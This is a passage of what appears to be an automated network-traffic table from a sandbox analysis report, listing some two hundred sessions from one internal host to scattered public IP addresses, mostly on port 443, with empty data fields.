                                                14814192.168.2.2350168194.72.247.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14815192.168.2.235519893.36.169.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14816192.168.2.235219452.42.190.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14817192.168.2.2343068171.105.230.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14818192.168.2.2339962192.192.70.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14819192.168.2.234720263.78.160.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14820192.168.2.2348148142.118.215.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14821192.168.2.233412477.176.174.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14822192.168.2.2343958168.238.249.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14823192.168.2.2333532183.28.148.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14824192.168.2.2356694181.254.196.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14825192.168.2.2350784193.189.90.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14826192.168.2.2351794131.205.237.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14827192.168.2.2345856103.101.40.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14828192.168.2.2356304124.57.185.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14829192.168.2.234230085.66.83.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14830192.168.2.2334152169.190.217.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14831192.168.2.2358832185.3.55.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14832192.168.2.234737882.78.116.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14833192.168.2.2345266133.102.111.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14834192.168.2.2349992112.172.213.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14835192.168.2.233508080.39.101.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14836192.168.2.2339734195.156.1.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14837192.168.2.233918237.14.72.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14838192.168.2.2354948182.221.166.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14839192.168.2.233285475.63.200.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14840192.168.2.2337226149.228.242.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14841192.168.2.235711090.32.152.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14842192.168.2.235641612.236.250.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14843192.168.2.234056895.161.221.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14844192.168.2.2342442132.27.99.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14845192.168.2.2344448145.75.107.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14846192.168.2.2344818139.11.138.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14847192.168.2.2358054146.248.153.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14848192.168.2.235678824.156.201.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14849192.168.2.23609245.219.165.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14850192.168.2.2350558191.6.150.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14851192.168.2.2339474140.62.55.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14852192.168.2.234462636.239.65.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14853192.168.2.2336886155.187.85.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14854192.168.2.2351340155.4.91.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14855192.168.2.2336194165.97.120.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14856192.168.2.2347030189.209.83.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14857192.168.2.2359424194.136.236.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14858192.168.2.235647283.171.92.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14859192.168.2.2354928132.177.186.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14860192.168.2.2354858104.20.202.2468080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14861192.168.2.2349834121.124.191.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14862192.168.2.236058070.190.226.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14863192.168.2.2332954206.115.125.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14864192.168.2.2337982192.99.74.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14865192.168.2.233400652.114.209.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14866192.168.2.2353586178.160.167.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14867192.168.2.2347824170.34.64.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14868192.168.2.2358564141.51.12.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14869192.168.2.23511465.245.176.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14870192.168.2.2342084144.55.17.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14871192.168.2.235286247.64.24.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14872192.168.2.2345244148.236.47.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14873192.168.2.2354312166.146.135.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14874192.168.2.235601488.249.123.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14875192.168.2.2357928212.233.219.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14876192.168.2.235858281.22.27.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14877192.168.2.234670453.87.244.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14878192.168.2.2345270213.27.155.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14879192.168.2.2346376109.193.90.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14880192.168.2.233931657.112.13.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14881192.168.2.2346630201.54.194.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14882192.168.2.2359236117.112.191.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14883192.168.2.233592276.35.146.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14884192.168.2.235366041.248.115.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14885192.168.2.2355502193.179.100.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14886192.168.2.233945031.9.73.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14887192.168.2.235384866.56.71.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14888192.168.2.2348414148.61.211.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14889192.168.2.234058277.178.35.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14890192.168.2.2347422124.199.209.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14891192.168.2.234650078.151.55.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14892192.168.2.2360318158.140.101.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14893192.168.2.2357786103.28.20.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14894192.168.2.2337972213.16.151.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14895192.168.2.2352842116.213.225.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14896192.168.2.2341940111.18.67.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14897192.168.2.235025689.86.100.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14898192.168.2.2335968102.254.226.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14899192.168.2.234402685.4.16.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14900192.168.2.2339592186.97.32.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14901192.168.2.2356696178.237.104.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14902192.168.2.235911881.249.180.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14903192.168.2.2359912200.17.156.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14904192.168.2.2340448212.122.102.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14905192.168.2.236027264.227.149.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14906192.168.2.2349754162.105.34.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14907192.168.2.2357568170.199.80.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14908192.168.2.2345398195.75.23.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14909192.168.2.2349606160.213.1.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14910192.168.2.2347074152.16.34.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14911192.168.2.2349134101.20.63.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14912192.168.2.23330981.118.148.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14913192.168.2.235853869.107.15.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14914192.168.2.234258689.220.37.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14915192.168.2.233966846.150.89.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14916192.168.2.2344458134.180.218.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14917192.168.2.2338806125.165.135.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14918192.168.2.235274481.77.231.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14919192.168.2.235377478.121.18.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14920192.168.2.235747827.241.214.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14921192.168.2.2336494134.17.70.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14922192.168.2.235179812.224.120.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14923192.168.2.235140091.64.52.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14924192.168.2.2344302202.24.77.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14925192.168.2.235107492.175.182.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14926192.168.2.2360014211.54.221.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14927192.168.2.2343734177.252.252.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14928192.168.2.2356094145.248.42.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14929192.168.2.2356284163.48.138.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14930192.168.2.235436836.204.166.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14931192.168.2.2360332111.131.141.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14932192.168.2.2345228111.81.135.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14933192.168.2.235332858.53.142.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14934192.168.2.2356224168.51.244.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14935192.168.2.2347472155.250.80.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14936192.168.2.234484852.141.22.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14937192.168.2.233550659.2.5.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14938192.168.2.235316436.125.194.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14939192.168.2.2360120182.214.173.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14940192.168.2.2334622154.60.18.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14941192.168.2.2348622155.227.44.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14942192.168.2.233391053.240.187.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14943192.168.2.2357842135.242.56.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14944192.168.2.234352897.177.4.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14945192.168.2.23355441.167.98.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14946192.168.2.235503683.192.110.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14947192.168.2.2338122179.235.99.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14948192.168.2.235852236.191.238.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14949192.168.2.2336892219.162.94.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14950192.168.2.2352514205.216.234.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14951192.168.2.234280837.160.155.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14952192.168.2.234509084.92.187.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14953192.168.2.2341022194.201.96.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14954192.168.2.2337190209.8.38.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14955192.168.2.235142659.149.91.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14956192.168.2.2337850210.61.148.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14957192.168.2.23358309.211.20.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14958192.168.2.2347470191.66.143.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14959192.168.2.2335156173.70.133.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14960192.168.2.2348020210.191.252.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14961192.168.2.234179618.91.150.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14962192.168.2.2344144162.15.112.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14963192.168.2.2335634182.55.191.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14964192.168.2.2360530118.130.54.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14965192.168.2.2348518153.9.223.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14966192.168.2.234566639.7.225.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14967192.168.2.2338144129.119.153.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14968192.168.2.2354804173.41.96.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14969192.168.2.234299690.179.47.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14970192.168.2.235214032.180.50.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14971192.168.2.2338652191.197.105.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14972192.168.2.2352816183.58.182.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14973192.168.2.234328047.191.223.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14974192.168.2.23436841.128.131.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14975192.168.2.2356854201.225.155.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14976192.168.2.2335852177.7.195.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14977192.168.2.2333170198.251.196.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14978192.168.2.2351220183.117.53.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14979192.168.2.2344184190.222.92.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14980192.168.2.233366414.200.226.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14981192.168.2.234387896.86.123.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14982192.168.2.235678671.186.16.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14983192.168.2.2333920161.36.3.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14984192.168.2.2341344213.141.66.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14985192.168.2.23444804.125.137.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14986192.168.2.2349374222.44.74.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14987192.168.2.2334406142.210.142.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14988192.168.2.235683627.19.176.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14989192.168.2.234187084.232.33.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14990192.168.2.234917612.223.51.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14991192.168.2.234683098.184.178.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14992192.168.2.2343008198.10.128.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14993192.168.2.235388225.70.6.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14994192.168.2.235635269.207.217.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14995192.168.2.234048238.209.181.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14996192.168.2.2336554143.138.154.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14997192.168.2.234059471.64.54.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14998192.168.2.234423818.243.138.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14999192.168.2.235234423.35.251.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15000192.168.2.233793846.120.144.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15001192.168.2.235990468.15.93.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15002192.168.2.2348900177.73.231.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15003192.168.2.234637014.210.142.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15004192.168.2.234331037.232.174.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15005192.168.2.2349926159.121.79.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15006192.168.2.234858884.248.82.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15007192.168.2.2341974188.110.252.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15008192.168.2.23557145.60.29.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15009192.168.2.2358448111.88.188.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15010192.168.2.2349276121.177.118.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15011192.168.2.2359162167.181.128.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15012192.168.2.2354216185.37.231.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15013192.168.2.2333078146.168.183.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15014192.168.2.235680452.14.222.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15015192.168.2.2334494126.204.241.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15016192.168.2.2342664175.180.56.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15017192.168.2.2352264195.249.219.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15018192.168.2.2349472129.65.156.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15019192.168.2.234678445.2.226.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15020192.168.2.235975086.7.226.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15021192.168.2.233819087.234.62.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15022192.168.2.2351592117.63.94.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15023192.168.2.2348302197.101.225.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15024192.168.2.2347338157.189.107.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15025192.168.2.2355450102.162.51.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15026192.168.2.234028868.151.38.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15027192.168.2.2356622164.16.243.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15028192.168.2.233820869.253.35.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15029192.168.2.235201471.129.187.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15030192.168.2.2351128166.37.171.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15031192.168.2.2350418222.39.24.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15032192.168.2.2335834144.69.142.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15033192.168.2.2342588178.132.83.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15034192.168.2.23448685.175.214.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15035192.168.2.2359220195.76.24.203443
                                                TimestampBytes transferredDirectionData


